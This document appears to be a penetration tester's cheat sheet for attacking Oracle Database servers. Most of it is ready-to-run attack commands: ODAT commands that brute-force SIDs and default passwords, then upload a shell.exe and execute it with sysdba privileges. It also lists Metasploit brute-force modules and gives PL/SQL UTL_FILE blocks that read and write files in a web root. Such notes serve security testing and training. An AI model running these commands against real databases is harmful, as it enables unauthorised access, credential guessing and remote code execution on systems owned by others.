Oracle

Oracle Database is a multi-model database management system produced and marketed by Oracle Corporation. It is a database commonly used for running online transaction processing, data warehousing and mixed database workloads.

-- Wikipedia

General

sysdba is like sudo

ODAT

Oracle Database Attacking Tool GitHub - quentinhardy/odat: ODAT

Guess sid (Oracle System ID)

odat.py sidguesser -s <ip> -p <port>

Guess password (using sid)

/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

-> Replace by /

odat.py passwordguesser -d <sid> --accounts-file <file> -s <ip>

Download/upload/delete files

./odat.py utlfile -s <ip> --sysdba -d XE -U <user> -P <password> --putFile /temp shell.exe ../shell.exe

Read files or execute system commands/scripts

./odat.py externaltable -s <ip> --sysdba -d XE -U <user> -P <password> --exec /temp shell.exe

SQL Plus

SQL Plus is the most basic Oracle Database utility, with a basic command-line interface, commonly used by users, administrators, and programmers.

-- Wikipedia

sqlplus <user>/<pass>@<ip>:<port>/<sid> as sysdba

Metasploit

admin/oracle/sid_brute

admin/oracle/oracle_login

File operations

Read

declare 
	f utl_file.file_type;
	s varchar(200);
begin
	f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.html', 'R');
	utl_file.get_line(f, s);
	utl_file.close(f);
	dbms_output.put_line(s);
end;

Enable display of output

set serveroutput ON

Execute it

/

Write

declare 
	f utl_file.file_type;
	s varchar(5000) := 'contents';
begin
	f := utl_file.fopen('/inetpub/wwwroot', 'file.txt', 'W');
	utl_file.put_line(f, s);
	utl_file.close(f);
	dbms_output.put_line(s);
end;

Execute it

/

Check privileges

select * from session_privs;
select * from user_role_privs;